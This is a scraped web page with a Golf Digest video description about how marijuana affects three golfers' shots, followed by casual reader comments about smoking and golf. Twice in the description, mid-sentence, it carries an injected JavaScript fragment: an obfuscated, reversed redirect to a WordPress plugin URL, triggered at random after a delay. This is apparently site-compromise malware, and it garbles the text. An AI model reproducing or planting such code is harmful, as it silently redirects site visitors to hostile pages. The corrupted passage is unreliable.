How Marijuana Affects Your Golf Game | Golf Digest

In this influential study, three golfers of different skill levels try a series of golf shots after consuming more and more marijuana toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to see how cannabis affects their game. A semi-pro, an amateur, and a casual golfer progress through five rounds of driving off the tee, hitting with an iron, and putting on the green – first while sober then smoking more and more with each round of shots. Sports Medicine Physician Dr. Ara Suppiah MD explains what’s happening toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to each golfer under the influence.

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How Marijuana Affects Your Golf Game | Golf Digest

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40 thoughts on “How Marijuana Affects Your Golf Game | Golf Digest”

  1. Jacob Sever says:

    Hey Golf Digest, I think you guys might need to lay off the weed. In Round 2, Willie's wedges went: 8 feet, 8 feet, 5 feet, 10 feet, 30 feet; yet somehow that averages out to an average distance of 37 feet?! Y'all need better mathematicians.

  2. Chris Gray says:

    Ha six nerds didnt like it.

  3. Mdmchannel says:

    I played better the one time I toked before teeing it up. It relieved my back pain and my swing was more fluid

  4. Geep1778 says:

    Sativa def helps

  5. Ben A says:

    You sure that iron shot is 125 feet? All of those swings are hitting balls much further than 40 yards..

  6. Christian Hall says:

    Let’s take the 2 best golfers, get the high, and put them against a guy with an 18 handicap. WHICH IS CRAP!!! Then act like it makes you Tiger Woods.

  7. Hoke Roberson says:

    He’s definitely not a 6 handicap the 13 handicap is way better

  8. Michael Reid says:

    Is that willie Nelson? Dude is better the higher he gets.

  9. Alex Chiron says:

    weed doesnt afect anyting i have ben smoken for evyday for abeut 9 yrs now an i fel grate evaday but mosly my golf game is perferct bacuase i smok ever time bafere and now i shot about a 40 on 18 hols ever time

  10. Skimps says:

    jack actually hits nukes

  11. Harry Peterson says:

    Marijuana seemed to have worked for Matt Every

  12. Jiu Jitsu Dweeb says:

    Golfing on meth next!!

  13. Ben Ryan says:

    What type of golf shoes are those brown ones?

  14. Hammarhead Vegan says:

    For some reason, I feel like playing a round.

  15. Joe says:

    Hey look, STL rams…

  16. Robert Salazar says:

    excellent idea I saw the alcohol you tube now this one. really makes you think about if people can play with these substances.

  17. TheXanUser says:

    I definitely putt better stoned.
    Please do LSD or mushrooms next!

  18. Android602715 says:

    Que incoming “no way that guys a *insert handicap*, I’m WAYYY better than him” comments

  19. Drew Clapp says:

    How is this not restricted?

  20. John Bivens says:

    I feel that I should be a candidate for this study…scores have always increased for me. 4 hdcp let's do this!

  21. MistakenMystery says:

    The key is having the CBD to balance out thos super high THC strains, i have been smoking for 16 years and i found that taking some CBD oil before i smoke makes it 100% better

  22. Kevin Ryan says:

    Slight advice, I would find golfers who normally do smoke and have them actually play on a course. A driving range is one thing because there is no sense of anxiety because if you miss it doesn't matter. But take it to a course and watch how thc would actually lower their anxiety because a lot of golfers will play better when they focus on their swing less.

  23. Danielrules says:

    This is a relevant, progressive, and future thinking video. It goes against everything golf channel stands for. More of these please.

  24. Guil Cout says:

    Immediately after smoking I'm definitely not relaxed.. more like buzzed and confused. Then its smoothness and clarity. Anyone else loves the latter but not the former?

  25. MrWellingtonInc says:


  26. Kevin Nzuki says:

    How tf does 1 joint have 16mg?? Either you guys have your figures mixed up (probs missing a couple of zeros) or that is a disgustingly weak strain…

    Illustration: 1 joint can contain at most let's say 1g = 1000mg. If the thc content is at a modest 15%, each joint should contain at most 150mg of thc and maybe around 130mg. If they consumed 50mg total – not even half a standard joint – over the whole experiment (Took well over an hour to conduct); this whole vid was impractical BS. Plus that's just the amount they consumed not what was absorbed

  27. JNeuel says:

    The more stoned I get watching this, the funnier that Indian guy sounds…..just sayin

  28. John MacTavish says:

    next try coke

  29. Brayden Buchanan says:

    Apparently Steve the pirate stopped playing dodgeball and picked up golf

  30. Sarah Smith says:

    it was cute, but like they said, it affects certain people differently, that's true, it's all about moderation when you get to the point you know when to stop, you say pass it I'm good, and you continue to do better. It's amazing and not in access; it's beneficial.

  31. sourjellybaby says:

    The funniest comments to the most suprising video I've seen on Youtube for a couple of months

  32. jarrodbrush says:

    A soft 7.

  33. AWPGaming says:

    i had a burger for lunch, im still hungry to be honest lol.. dude we all been there hahah this video was great

  34. Reconciliation says:

    If you smoke pot, golf ain't your sport. Try some WWE you piece of trash!

  35. Rodney O'Brien says:

    Hoexactly where is golf play-offs todayw

  36. Bradley Teggin says:

    has anyone tried i have just purchased to use on the course next time!! 🙂

  37. Chris says:

    I love Cannibus

  38. fortylove68 says:

    Smoked once at a driving range on Belle Isle in Detroit ended up in Lake Saint Clair in my boxers staring at the sunset. That was a good day.

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